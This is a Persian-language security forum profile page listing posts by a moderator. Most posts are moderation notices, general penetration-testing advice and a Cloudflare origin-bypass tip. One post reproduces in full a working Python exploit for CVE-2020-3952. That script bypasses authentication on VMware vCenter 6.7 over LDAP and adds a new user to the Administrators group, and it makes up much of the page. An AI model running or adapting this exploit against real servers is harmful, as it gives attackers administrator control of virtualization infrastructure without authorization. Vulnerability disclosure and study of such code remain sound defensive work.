با توجه به آماده سازی و تامین زیرساخت لازم جهت تبدیل انجمن به یک منبع آموزشی در حوزه امنیت و ارزیابی امنیت، لطفا فایل های خود را در انجمن پیوست نمایید. در غیر این صورت تاپیک شما حذف خواهد شد.
-
تعداد ارسال ها
536 -
تاریخ عضویت
-
آخرین بازدید
-
روز های برد
11 -
Country
ایران
نوع محتوا
نمایه ها
تالارهای گفتگو
تقویم
Articles
بخش دریافت
تمامی مطالب نوشته شده توسط root3r
-
جست و جو : https://iran-cyber.net/forums/search/?q=cloudflare&quick=1 مطالب :
-
DONGLE!.part2.rar DONGLE!.part3.rar DONGLE!.part4.rar DONGLE!.part5.rar
-
لطفا جهت ماندگاری منابع و دسترس بودن آن در انجمن پیوست نمایید. پارت اول DONGLE!.part1.rar
-
SQLI DUMPER V.10.3 - V.10.2 - V.9.7 - V.8.5 - V.8.2 - V.8.0 - V.7.0 (ALL STABLE & CLEAN VERSIONS)
sitehunter پاسخی برای موضوع ارسال کرد برای یک root3r در Software
@sitehunter با عرض ادب و احترام لینک خروجی ممنوع میباشد. منابع خود را پیوست کنید در غیر این صورت پست شما حذف خواهد شد. -
درخواست اکانت کرک شده از سایت چمیرا هزینه هم میدم
javaheri69 پاسخی برای موضوع ارسال کرد برای یک root3r در بحث آزاد
خلاف قوانین میباشد , از بازگشایی چنین پست هایی با این محتوا خودداری فرمایید. اگر کسی میتونه دوستمون رو کمک کنه , پیام خصوصی در ارتباط باشن -
@payam99 با عرض ادب و احترام برای ارزیابی امنیت و پیدا کردن آسیب پذیری متد های مختلف و روش هایی رو باید مورد ازمایش قرار دهید. برای مثال در مورد وبسایت باید وارد زیر مورد بررسی واقع شود: و برای نفوذ به یک وبسایت از چند طریق قابلیت اقدام و نفوذ میباشد: 1- نفوذ به صورت مستقیم از طریق وبسایت 2- نفوذ به صورت غیرمستقیم از طریق وبسایت های مشترک بر روی سرور 3- آنالیز سرور و بررسی ماژول ها و پکیج های نصب شده بر روی سرور اصلی که بخوایم هر مورد رو بصورت کامل بررسی کنیم خیلی طولانی خواهد شد. اما در روش اول شما میتوانید از طریق ابزارهای مختلف یا بصورت Manual شروع به انالیز پارامتر ها - ریکوئست ها - Header ها و تمامی موارد رو مورد بررسی قرار داده و در صورت هرگونه موارد مشکوک اقدام به تست انواع آسیب پذیری های احتمالی کرد. در مورد دوم نیازمند تست تمامی مراحل ذکر شده در یک وبسایت مشترک با سایت هدف میباشد و بعد از پیدا کردن آسیب پذیری و بهروری اسیب پذیری که منجر به گرفتن دسترسی از وبسایت مشترک خواهد شد و سپس اقدام به نفوذ به سرور جهت ایجاد دسترسی از سایت مورد نظر انجام شود. * مقالات استفاده از Acunetix - burp suite هم ببرسی نمایید.
- 1 پاسخ
-
- 5
-
-
-
ابزاری برای پنهان نگاری
soldier-only پاسخی برای موضوع ارسال کرد برای یک root3r در سوال و جواب های بخش کشف جرایم رایانه ای
سلام در بخش سوال جواب ابزار قرار دادید؟ قوانین رو مطالعه کنید و با توجه به نوع محتوا پست ایجاد کنید با عنوان مناسب و در بخش قابل قبول ابزارهایی که قرار میدهید لینک اسکن همراه با اسکرین و توضیحات کامل از اسم و سازنده ابزار قرار داده در غیر این صورت تمامی پست های قرارداده شده حذف خواهد شد- 1 پاسخ
-
- 3
-
-
-
داخل فروم سرچ کنید: اسکریپت های دیگر هم قرار داده شده بررسی نمایید ببینید کدوم بدردتون میخوره!
-
VMware vCenter 6.7 Vulnerability - Authentication bypass
یک موضوع پاسخی ارسال کرد برای root3r در تحلیل و بررسی آسیب پذیری های سایت و سرورها
آسیب پذیری از Vmware vCenter : VMware vCenter Server 6.7 - Authentication Bypass چندی پیش آسیب پذیری از Vmware vCenter ورژن 6.7 کشف و اعلام شد . با بهره از این آسیب پذیری امکان دورزدن احراز هویت ( Authentication Bypass ) در Vmware vCenter Server میباشد. دراصطلاح هکر با قادر است یک حساب کاربری با سطح دسترسی Administrator اضافه کند و علت این آسیب پذیری که حساس هم هست دو دلیل داره : 1- خطا و ایراد در سیستم بررسی سطح درسترسی ها و مجوزها 2- خطا در LDAP که امکان و مجوز بدون احرازهویت را میدهد. V 6.7 : # Exploit Title: VMware vCenter Server 6.7 - Authentication Bypass # Date: 2020-06-01 # Exploit Author: Photubias # Vendor Advisory: [1] https://www.vmware.com/security/advisories/VMSA-2020-0006.html # Version: vCenter Server 6.7 before update 3f # Tested on: vCenter Server Appliance 6.7 RTM (updated from v6.0) # CVE: CVE-2020-3952 #!/usr/bin/env python3 ''' Copyright 2020 Photubias(c) This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. Based (and reverse engineerd from): https://github.com/guardicore/vmware_vcenter_cve_2020_3952 File name CVE-2020-3592.py written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be ## Vulnerable setup (requirements): vCenter Server 6.7 that was upgraded from 6.x This is a native implementation without requirements, written in Python 3. Works equally well on Windows as Linux (as MacOS, probably ;-) Features: exploit + vulnerability checker ''' import binascii, socket, sys, string, random ## Default vars; change at will _sIP = '192.168.50.35' _iPORT = 389 _iTIMEOUT = 5 def randomString(iStringLength=8): #sLetters = string.ascii_lowercase sLetters = string.ascii_letters return ''.join(random.choice(sLetters) for i in range(iStringLength)) def getLengthPrefix(sData, sPrefix, hexBytes=1): ## sData is hexlified ## This will calculate the length of the string, and verify if an additional '81' or '82' prefix is needed sReturn = sPrefix if (len(sData) / 2 ) > 255: sReturn += b'82' hexBytes = 2 elif (len(sData) /2 ) >= 128: sReturn += b'81' sReturn += f"{int(len(sData)/2):#0{(hexBytes*2)+2}x}"[2:].encode() return sReturn def buildBindRequestPacket(sUser, sPass): sUser = binascii.hexlify(sUser.encode()) sPass = binascii.hexlify(sPass.encode()) ## Packet Construction sPacket = getLengthPrefix(sPass, b'80') + sPass sPacket = getLengthPrefix(sUser, b'04') + sUser + sPacket sPacket = b'020103' + sPacket sPacket = getLengthPrefix(sPacket, b'60') + sPacket sPacket = b'020101' + sPacket sPacket = getLengthPrefix(sPacket, b'30') + sPacket #print(sPacket) return binascii.unhexlify(sPacket) def buildUserCreatePacket(sUser, sPass): sUser = binascii.hexlify(sUser.encode()) sPass = binascii.hexlify(sPass.encode()) def createAttribute(sName, sValue): sValue = getLengthPrefix(sValue, b'04') + sValue sName = getLengthPrefix(sName, b'04') + sName sReturn = getLengthPrefix(sValue, b'31') + sValue sReturn = sName + sReturn sReturn = getLengthPrefix(sReturn, b'30') + sReturn return sReturn def createObjectClass(): sReturn = getLengthPrefix(binascii.hexlify(b'top'), b'04') + binascii.hexlify(b'top') sReturn += getLengthPrefix(binascii.hexlify(b'person'), b'04') + binascii.hexlify(b'person') sReturn += getLengthPrefix(binascii.hexlify(b'organizationalPerson'), b'04') + binascii.hexlify(b'organizationalPerson') sReturn += getLengthPrefix(binascii.hexlify(b'user'), b'04') + binascii.hexlify(b'user') sReturn = getLengthPrefix(sReturn, b'31') + sReturn sReturn = getLengthPrefix(binascii.hexlify(b'objectClass'), b'04') + binascii.hexlify(b'objectClass') + sReturn sReturn = getLengthPrefix(sReturn, b'30') + sReturn return sReturn ## Attributes sAttributes = createAttribute(binascii.hexlify(b'vmwPasswordNeverExpires'), binascii.hexlify(b'True')) sAttributes += createAttribute(binascii.hexlify(b'userPrincipalName'), sUser + binascii.hexlify(b'@VSPHERE.LOCAL')) sAttributes += createAttribute(binascii.hexlify(b'sAMAccountName'), sUser) sAttributes += createAttribute(binascii.hexlify(b'givenName'), sUser) sAttributes += createAttribute(binascii.hexlify(b'sn'), binascii.hexlify(b'vsphere.local')) sAttributes += createAttribute(binascii.hexlify(b'cn'), sUser) sAttributes += createAttribute(binascii.hexlify(b'uid'), sUser) sAttributes += createObjectClass() sAttributes += createAttribute(binascii.hexlify(b'userPassword'), sPass) ## CN sCN = binascii.hexlify(b'cn=') + sUser + binascii.hexlify(b',cn=Users,dc=vsphere,dc=local') sUserEntry = getLengthPrefix(sCN, b'04') + sCN ## Packet Assembly (bottom up) sPacket = getLengthPrefix(sAttributes, b'30') + sAttributes sPacket = sUserEntry + sPacket sPacket = getLengthPrefix(sPacket, b'02010268', 2) + sPacket sPacket = getLengthPrefix(sPacket, b'30') + sPacket #print(sPacket) return binascii.unhexlify(sPacket) def buildModifyUserPacket(sUser): sFQDN = binascii.hexlify(('cn=' + sUser + ',cn=Users,dc=vsphere,dc=local').encode()) sCN = binascii.hexlify(b'cn=Administrators,cn=Builtin,dc=vsphere,dc=local') sMember = binascii.hexlify(b'member') ## Packet Construction sPacket = getLengthPrefix(sFQDN, b'04') + sFQDN sPacket = getLengthPrefix(sPacket, b'31') + sPacket sPacket = getLengthPrefix(sMember, b'04') + sMember + sPacket sPacket = getLengthPrefix(sPacket, b'0a010030') + sPacket sPacket = getLengthPrefix(sPacket, b'30') + sPacket sPacket = getLengthPrefix(sPacket, b'30') + sPacket sPacket = getLengthPrefix(sCN, b'04') + sCN + sPacket sPacket = getLengthPrefix(sPacket, b'02010366') + sPacket sPacket = getLengthPrefix(sPacket, b'30') + sPacket #print(sPacket) return binascii.unhexlify(sPacket) def performBind(s): ## Trying to bind, fails, but necessary (even fails when using correct credentials) dPacket = buildBindRequestPacket('[email protected]','www.IC4.be') s.send(dPacket) sResponse = s.recv(1024) try: sResponse = sResponse.split(b'\x04\x00')[0][-1:] sCode = binascii.hexlify(sResponse).decode() if sCode == '31': print('[+] Ok, service reachable, continuing') else: print('[-] Something went wrong') except: pass return sCode def performUserAdd(s, sUser, sPass): dPacket = buildUserCreatePacket(sUser,sPass) s.send(dPacket) sResponse = s.recv(1024) try: sCode = sResponse.split(b'\x04\x00')[0][-1:] sMessage = sResponse.split(b'\x04\x00')[1] if sCode == b'\x00': print('[+] Success! User ' + sUser + '@vsphere.local added with password ' + sPass) elif sCode == b'\x32': print('[-] Error, this host is not vulnerable (insufficientAccessRights)') else: if sMessage[2] == b'81': sMessage = sMessage[3:].decode() else: sMessage = sMessage[2:].decode() print('[-] Error, user not added, message received: ' + sMessage) except: pass return sCode def performUserMod(s, sUser, verbose = True): dPacket = buildModifyUserPacket(sUser) s.send(dPacket) sResponse = s.recv(1024) try: sCode = sResponse.split(b'\x04\x00')[0][-1:] sMessage = sResponse.split(b'\x04\x00')[1] if sCode == b'\x00': if verbose: print('[+] User modification success (if the above is OK).') else: if sMessage[2] == b'81': sMessage = sMessage[3:].decode() else: sMessage = sMessage[2:].decode() if verbose: print('[-] Error during modification, message received: ' + sMessage) except: pass return sCode, sMessage def performUnbind(s): try: s.send(b'\x30\x05\x02\x01\x04\x42\x00') except: pass def main(): global _sIP, _iPORT, _iTIMEOUT _sUSER = 'user_' + randomString(6) _sPASS = randomString(8) + '_2020' bAdduser = False if len(sys.argv) == 1: print('[!] No arguments found: python3 CVE-2020-3592.py <dstIP> [<newUsername>] [<newPassword>]') print(' Example: ./CVE-2020-3592.py ' + _sIP + ' ' + _sUSER + ' ' + _sPASS) print(' Leave username & password empty for a vulnerability check') print(' Watch out for vCenter/LDAP password requirements, leave empty for random password') print(' But for now, I will ask questions') sAnswer = input('[?] Please enter the vCenter IP address [' + _sIP + ']: ') if not sAnswer == '': _sIP = sAnswer sAnswer = input('[?] Want to perform a check only? [Y/n]: ') if sAnswer.lower() == 'n': bAdduser = True if bAdduser: sAnswer = input('[?] Please enter the new username to add [' + _sUSER + ']: ') if not sAnswer == '': _sUSER = sAnswer sAnswer = input('[?] Please enter the new password for this user [' + _sPASS + ']: ') if not sAnswer == '': _sPASS = sAnswer else: _sIP = sys.argv[1] if len(sys.argv) >= 3: _sUSER = sys.argv[2] bAdduser = True if len(sys.argv) >= 4: _sPASS = sys.argv[3] ## MAIN print('') s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(_iTIMEOUT) try: s.connect((_sIP,_iPORT)) except: print('[-] Error: Host ' + _sIP + ':' + str(_iPORT) + ' not reachable') sys.exit(1) performBind(s) if bAdduser: sCode = performUserAdd(s, _sUSER, _sPASS) if not bAdduser: print('[!] Checking vulnerability') sCode, sMessage = performUserMod(s, 'Administrator', False) if sCode == b'\x32': print('[-] This host is not vulnerable, message: ' + sMessage) else: print('[+] This host is vulnerable!') else: sCode = performUserMod(s, _sUSER) performUnbind(s) s.close() if __name__ == "__main__": main()-
- 4
-
-
- vmware vulnerability
- authentication
-
(و 1 مورد دیگر)
برچسب زده شده با :
-
با عرض احترام تشکر بابت مطالب مفیدتون لطف میکنید تمامی ابزار و کد هایی که بصورت Screen قرار دادید اگر فایل هستند پیوست کنید و یا از تگ کد استفاده کنید؟ و اگر لازم هست بخشی مبنی بر فازینگ و ... در انجمن لحاض گردد بصورت پیام خصوصی در ارتباط باشید.
-
با احترام برای بار اول تبلیغ ممنوع هست , در صورت تکرار اخراج خواهید شد.
-
تشکر از شما , فایل هارو داخل انجمن اپلود کنید.
-
فایل Htdaccess
w0rld پاسخی برای موضوع ارسال کرد برای یک root3r در ابزارها و مقالات وب سرور IIS و Apache
محتوا فایل htaccess رو اینجا قرار بدین . بعد وقتی ' میزارین بلاک میشه ! خب مگر قصدتون همین نبود! الان درست داره کار میکنه مشکلتون چیه ؟ ولی در کل اینها به راحتی Bypass میشه -
فایل Htdaccess
w0rld پاسخی برای موضوع ارسال کرد برای یک root3r در ابزارها و مقالات وب سرور IIS و Apache
به دلیل حذف متون سوالات بعد از دریافت پاسخ توسط شما دسترسی ادیت رو برای شما برداشتم . میتونید Block کنید فقط اگر داخل وبسایت ( چه داخل سرچ یا پست ها از کاراکتر ها استفاده بشه ) تداخل داره و در کل استفاده از این روش ها به راحتی قابل Bypass هست ! -
چند سوال مربوط به هک دیتابیس(مهم)
w0rld پاسخی برای موضوع ارسال کرد برای یک root3r در Database Hacking
datalife آسیب پذیری Sql Injection زیاد داره هم Private هم Public . متوجه منظورتون نشدم که سایت داخل هاست و دیتابیس تغییری نکرده و حذف نشده ولی دیتابیس داخل سرور مجازی دلیت شده؟ متوجه منظورتون نمیشم ولی اگر منظورتون اینه که فایل بک آپ و یا فایلی داخل سرور مجازی حذف شده ربطی به Mysql نداره . -
فایل Htdaccess
w0rld پاسخی برای موضوع ارسال کرد برای یک root3r در ابزارها و مقالات وب سرور IIS و Apache
ابتدا اینکه سوالاتون رو داخل بخش سوال و جواب مطرح کنید و قوانین انجمن را مطالعه و رعایت فرمایید. میخواید تک کوتیشن داخل url قرار دادن کاربر Block یا ریدایرکت بشه؟ -
چند سوال مربوط به هک دیتابیس(مهم)
w0rld پاسخی برای موضوع ارسال کرد برای یک root3r در Database Hacking
با احترام لطفا مشخصات بیشتری از میزبانی که مورد نفوذ قرار گرفته قرار دهید تا راهنماییتون کنم . نوع وبسرور- ورژن ها و نرم افزارهای مورد استفاده قرار گرفته رو اعلام کنید اگر دیتابیستون مورد نفوذ قرار گرفته الزاما فقط از سمت خود Mysql نیست ! ممکنه اطلاعات دیتابیس از جای دیگری مورد سرقت قرار گرفته باشه ( سرور میزبان - آسیب پذیری نرم افزار و ... ) بخاطر همین گفتم اطلاعات تکمیلی بدین از نوع میزبان و کاربرد آن تا بهتر راهنمایی کنم. -
برای ارزیابی امنیت و انجام تست نفوذ بصورت رسمی و اصولی با بنده در ارتباط باشین درضمن هزینه ارزیابی امنیت خیلی بیشتر از این مبالغ هست و کسی برای 200 هزارتومن ارزش کار خودش رو پایین نمیاره !
-
[اختصاصی ایران سایبر] کسب درامد از طریق مقالات و مطالب اختصاصی
root3r پاسخی برای موضوع ارسال کرد برای یک root3r در اخبار و اطلاعیه
بله برنامه های زیادی در نظر داریم برای مقالات که هم برای انجمن مفید هست هم کاربر و رزومه ای هم میشه برای کسانی که مقاله ارسال میکنند . از این پس بیشتر به انجمن سر میزنم , دوستان میتوانید مقاله خودتون رو پیام خصوصی کنید. دوستانی هم که در مورد Sim jack مقاله دارند ارسال کنند. مقاله ای در این باره قصد تکمیل و ارائه در انجمن رو دارم -
اموزش کار با Nmap
new-god پاسخی برای موضوع ارسال کرد برای یک root3r در ابزارهای امنیتی و آنالیز سیستم ها
https://iran-cyber.net/forums/threads/%D8%AC%D8%A7%D9%85%D8%B9-%D8%AA%D8%B1%DB%8C%D9%86-%D8%A2%D9%85%D9%88%D8%B2%D8%B4-cloudflare-dns-protection-bypass.2136/ از وبسایت هایی که record DNS هارو کش میکنند هم میتوانید استفاده کنید , ممکنه قبل از ست شدن بر روی DNS های Cloudflare بر روی DNS ها اصلی خود ست بوده باشد. -
[اختصاصی ایران سایبر] کسب درامد از طریق مقالات و مطالب اختصاصی
یک موضوع پاسخی ارسال کرد برای root3r در اخبار و اطلاعیه
با عرض احترام خدمت مدیران و کاربران ، جهت افزایش بار علمی وبسایت و انجمن و همچنین کسب درامد برای کاربران و مدیران فروم تصمیم بر آن شد طرحی پیاده سازی شود جهت راه اندازی بخش تحقیقات که با توسعه بار علمی که منجر به افزایش سطح علمی انجمن و کاربران میشود و در جهت کسب درامد برای مدیران و کاربران هم تاثیر گذار خواهد بود. در این طرح که هدف اصلی افزایش سطح علمی و کسب درامد هست ، همراهان شرکت امنیتی ایران سایبر میتوانند با فعالیت در بخش تحقیقات وبسایت و دریافت عضویت مربوطه در بخش تیم تحقیقات ، مقالات اختصاصی خود را ( مقالات اختصاصی ) که این مقالات میتواند : مقالات علمی در زمینه برنامه نویسی ، هک و امنیت ، شبکه ، بدافزار ها و ... مقالات مربوط به تکنولوژی های مختلف مقالات و اخرین اخبار مربوط به حوزه فناوری اطلاعات و موارد مربوطه اخبار بروز دنیای هک ، امنیت و ... برای ما ارسال کرده پس از تایید مقاله هزینه آن با روش های مختلف به حساب نویسنده واریز میشود. قوانین: مقالات کپی و سرقت علمی مورد تایید نخواهد بود مطالب و مقالات ارسالی باید فقط و فقط در اختیار این شرکت قرار گیرد مطالب و مقالات ارسالی توسط کاربران به نام همان کاربر ( شخص نویسنده اصلی ) انتشار و در اختیار کاربران قرار خواهد گرفت. در صورت انتشار مقالات به چندین شرکت و منبع ، شرکت امنیتی ایران سایبر حق برخورد و رسیدگی به این موضوع را حق خود دانسته و آن را پیگیری خواهد نمود. درصورت وجود هرگونه سوال و ابهام میتوانید در ادامه همین تاپیک آن را مطرح نمایید. -
نحوه نصب تیم اسپیک بر روی لینوکس | How To Install Team Speak On Linux
0day پاسخی برای موضوع ارسال کرد برای یک root3r در GNU /Linux
iran-cyber.net -
دوستانی که مایل به همکاری هستند جهت دریافت بیشتر با ای دی تلگرام : @Cagefs در ارتباط باشند .
تاریخچه انجمن امنیتی ایران سایبر
شرکت امنیتی ایران سایبر با بکار گیری افراد متخصص در حوزه امنیت و ارائه راه کار در زمینه امنیت شبکه و امنیت بانک های اطلاعاتی در سال ۲۰۰۹ کار خود را آغاز نمود.
این شرکت با تعریفی جدید از ارائه خدمات و مشاوره در حوزه امنیت سازمان ها و مراکز، تست نفوذ، و برنامه نویسی در تعاملی سازنده با سازمان ها، مشتری مداری را سرلوحه کار خود قرار داده و آماده همکاری با شرکت ها و ارگان های مختلف می باشد.
آدرس های داخلی شرکت
آدرس های داخلی شرکت
رعایت قوانین
شرکت و انجمن امنیتی ایران سایبر با توجه به حضور مجاز و رسمی در محافل امنیتی و شرکت های ارزیابی امنیت ملزم به رعایت قوانین بوده و کاربران انجمن نیز ملزم به رعایت قوانین جمهوری اسلامی ایران میباشد.